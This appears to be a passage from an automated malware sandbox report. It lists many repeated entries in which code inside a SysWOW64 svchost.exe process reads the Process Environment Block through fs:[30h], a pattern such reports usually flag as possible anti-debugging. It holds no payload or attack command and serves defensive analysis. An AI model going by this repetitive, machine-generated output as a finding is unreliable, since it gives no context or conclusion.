                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC62A0 mov eax, dword ptr fs:[00000030h]10_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC62A0 mov eax, dword ptr fs:[00000030h]10_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E284 mov eax, dword ptr fs:[00000030h]10_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E284 mov eax, dword ptr fs:[00000030h]10_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB0283 mov eax, dword ptr fs:[00000030h]10_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB0283 mov eax, dword ptr fs:[00000030h]10_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB0283 mov eax, dword ptr fs:[00000030h]10_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A402E1 mov eax, dword ptr fs:[00000030h]10_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A402E1 mov eax, dword ptr fs:[00000030h]10_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A402E1 mov eax, dword ptr fs:[00000030h]10_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]10_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]10_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]10_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]10_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]10_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2823B mov eax, dword ptr fs:[00000030h]10_2_03A2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A34260 mov eax, dword ptr fs:[00000030h]10_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A34260 mov eax, dword ptr fs:[00000030h]10_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A34260 mov eax, dword ptr fs:[00000030h]10_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2826B mov eax, dword ptr fs:[00000030h]10_2_03A2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]10_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]10_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]10_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]10_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]10_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]10_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]10_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]10_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]10_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]10_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]10_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0274 mov eax, dword ptr fs:[00000030h]10_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB8243 mov eax, dword ptr fs:[00000030h]10_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB8243 mov ecx, dword ptr fs:[00000030h]10_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2A250 mov eax, dword ptr fs:[00000030h]10_2_03A2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A36259 mov eax, dword ptr fs:[00000030h]10_2_03A36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A70185 mov eax, dword ptr fs:[00000030h]10_2_03A70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AEC188 mov eax, dword ptr fs:[00000030h]10_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AEC188 mov eax, dword ptr fs:[00000030h]10_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD4180 mov eax, dword ptr fs:[00000030h]10_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD4180 mov eax, dword ptr fs:[00000030h]10_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB019F mov eax, dword ptr fs:[00000030h]10_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB019F mov eax, dword ptr fs:[00000030h]10_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB019F mov eax, dword ptr fs:[00000030h]10_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB019F mov eax, dword ptr fs:[00000030h]10_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2A197 mov eax, dword ptr fs:[00000030h]10_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2A197 mov eax, dword ptr fs:[00000030h]10_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2A197 mov eax, dword ptr fs:[00000030h]10_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B061E5 mov eax, dword ptr fs:[00000030h]10_2_03B061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A601F8 mov eax, dword ptr fs:[00000030h]10_2_03A601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF61C3 mov eax, dword ptr fs:[00000030h]10_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF61C3 mov eax, dword ptr fs:[00000030h]10_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]10_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]10_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]10_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]10_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]10_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A60124 mov eax, dword ptr fs:[00000030h]10_2_03A60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ADA118 mov ecx, dword ptr fs:[00000030h]10_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ADA118 mov eax, dword ptr fs:[00000030h]10_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ADA118 mov eax, dword ptr fs:[00000030h]10_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ADA118 mov eax, dword ptr fs:[00000030h]10_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF0115 mov eax, dword ptr fs:[00000030h]10_2_03AF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC4144 mov eax, dword ptr fs:[00000030h]10_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC4144 mov eax, dword ptr fs:[00000030h]10_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC4144 mov ecx, dword ptr fs:[00000030h]10_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC4144 mov eax, dword ptr fs:[00000030h]10_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC4144 mov eax, dword ptr fs:[00000030h]10_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2C156 mov eax, dword ptr fs:[00000030h]10_2_03A2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC8158 mov eax, dword ptr fs:[00000030h]10_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A36154 mov eax, dword ptr fs:[00000030h]10_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A36154 mov eax, dword ptr fs:[00000030h]10_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC80A8 mov eax, dword ptr fs:[00000030h]10_2_03AC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF60B8 mov eax, dword ptr fs:[00000030h]10_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]10_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3208A mov eax, dword ptr fs:[00000030h]10_2_03A3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]10_2_03A2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A380E9 mov eax, dword ptr fs:[00000030h]10_2_03A380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB60E0 mov eax, dword ptr fs:[00000030h]10_2_03AB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]10_2_03A2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A720F0 mov ecx, dword ptr fs:[00000030h]10_2_03A720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB20DE mov eax, dword ptr fs:[00000030h]10_2_03AB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2A020 mov eax, dword ptr fs:[00000030h]10_2_03A2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2C020 mov eax, dword ptr fs:[00000030h]10_2_03A2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC6030 mov eax, dword ptr fs:[00000030h]10_2_03AC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB4000 mov ecx, dword ptr fs:[00000030h]10_2_03AB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]10_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]10_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]10_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]10_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]10_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]10_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]10_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD2000 mov eax, dword ptr fs:[00000030h]10_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4E016 mov eax, dword ptr fs:[00000030h]10_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4E016 mov eax, dword ptr fs:[00000030h]10_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4E016 mov eax, dword ptr fs:[00000030h]10_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4E016 mov eax, dword ptr fs:[00000030h]10_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5C073 mov eax, dword ptr fs:[00000030h]10_2_03A5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A32050 mov eax, dword ptr fs:[00000030h]10_2_03A32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB6050 mov eax, dword ptr fs:[00000030h]10_2_03AB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A307AF mov eax, dword ptr fs:[00000030h]10_2_03A307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD678E mov eax, dword ptr fs:[00000030h]10_2_03AD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A527ED mov eax, dword ptr fs:[00000030h]10_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A527ED mov eax, dword ptr fs:[00000030h]10_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A527ED mov eax, dword ptr fs:[00000030h]10_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]10_2_03ABE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A347FB mov eax, dword ptr fs:[00000030h]10_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A347FB mov eax, dword ptr fs:[00000030h]10_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]10_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB07C3 mov eax, dword ptr fs:[00000030h]10_2_03AB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6C720 mov eax, dword ptr fs:[00000030h]10_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6C720 mov eax, dword ptr fs:[00000030h]10_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6273C mov eax, dword ptr fs:[00000030h]10_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6273C mov ecx, dword ptr fs:[00000030h]10_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6273C mov eax, dword ptr fs:[00000030h]10_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAC730 mov eax, dword ptr fs:[00000030h]10_2_03AAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6C700 mov eax, dword ptr fs:[00000030h]10_2_03A6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A30710 mov eax, dword ptr fs:[00000030h]10_2_03A30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A60710 mov eax, dword ptr fs:[00000030h]10_2_03A60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A38770 mov eax, dword ptr fs:[00000030h]10_2_03A38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]10_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]10_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]10_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]10_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]10_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]10_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]10_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]10_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]10_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]10_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]10_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40770 mov eax, dword ptr fs:[00000030h]10_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6674D mov esi, dword ptr fs:[00000030h]10_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6674D mov eax, dword ptr fs:[00000030h]10_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6674D mov eax, dword ptr fs:[00000030h]10_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A30750 mov eax, dword ptr fs:[00000030h]10_2_03A30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABE75D mov eax, dword ptr fs:[00000030h]10_2_03ABE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72750 mov eax, dword ptr fs:[00000030h]10_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72750 mov eax, dword ptr fs:[00000030h]10_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB4755 mov eax, dword ptr fs:[00000030h]10_2_03AB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]10_2_03A6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A666B0 mov eax, dword ptr fs:[00000030h]10_2_03A666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A34690 mov eax, dword ptr fs:[00000030h]10_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A34690 mov eax, dword ptr fs:[00000030h]10_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]10_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]10_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]10_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]10_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB06F1 mov eax, dword ptr fs:[00000030h]10_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB06F1 mov eax, dword ptr fs:[00000030h]10_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]10_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]10_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4E627 mov eax, dword ptr fs:[00000030h]10_2_03A4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A66620 mov eax, dword ptr fs:[00000030h]10_2_03A66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A68620 mov eax, dword ptr fs:[00000030h]10_2_03A68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3262C mov eax, dword ptr fs:[00000030h]10_2_03A3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAE609 mov eax, dword ptr fs:[00000030h]10_2_03AAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]10_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]10_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]10_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]10_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]10_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]10_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4260B mov eax, dword ptr fs:[00000030h]10_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72619 mov eax, dword ptr fs:[00000030h]10_2_03A72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF866E mov eax, dword ptr fs:[00000030h]10_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF866E mov eax, dword ptr fs:[00000030h]10_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6A660 mov eax, dword ptr fs:[00000030h]10_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6A660 mov eax, dword ptr fs:[00000030h]10_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A62674 mov eax, dword ptr fs:[00000030h]10_2_03A62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4C640 mov eax, dword ptr fs:[00000030h]10_2_03A4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB05A7 mov eax, dword ptr fs:[00000030h]10_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB05A7 mov eax, dword ptr fs:[00000030h]10_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB05A7 mov eax, dword ptr fs:[00000030h]10_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A545B1 mov eax, dword ptr fs:[00000030h]10_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A545B1 mov eax, dword ptr fs:[00000030h]10_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A32582 mov eax, dword ptr fs:[00000030h]10_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A32582 mov ecx, dword ptr fs:[00000030h]10_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A64588 mov eax, dword ptr fs:[00000030h]10_2_03A64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E59C mov eax, dword ptr fs:[00000030h]10_2_03A6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]10_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]10_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]10_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]10_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]10_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]10_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]10_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]10_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A325E0 mov eax, dword ptr fs:[00000030h]10_2_03A325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6C5ED mov eax, dword ptr fs:[00000030h]10_2_03A6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6C5ED mov eax, dword ptr fs:[00000030h]10_2_03A6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E5CF mov eax, dword ptr fs:[00000030h]10_2_03A6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E5CF mov eax, dword ptr fs:[00000030h]10_2_03A6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A365D0 mov eax, dword ptr fs:[00000030h]10_2_03A365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]10_2_03A6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]10_2_03A6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40535 mov eax, dword ptr fs:[00000030h]10_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40535 mov eax, dword ptr fs:[00000030h]10_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40535 mov eax, dword ptr fs:[00000030h]10_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40535 mov eax, dword ptr fs:[00000030h]10_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40535 mov eax, dword ptr fs:[00000030h]10_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40535 mov eax, dword ptr fs:[00000030h]10_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E53E mov eax, dword ptr fs:[00000030h]10_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E53E mov eax, dword ptr fs:[00000030h]10_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E53E mov eax, dword ptr fs:[00000030h]10_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E53E mov eax, dword ptr fs:[00000030h]10_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5E53E mov eax, dword ptr fs:[00000030h]10_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC6500 mov eax, dword ptr fs:[00000030h]10_2_03AC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]10_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]10_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]10_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]10_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]10_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]10_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]10_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6656A mov eax, dword ptr fs:[00000030h]10_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6656A mov eax, dword ptr fs:[00000030h]10_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6656A mov eax, dword ptr fs:[00000030h]10_2_03A6656A
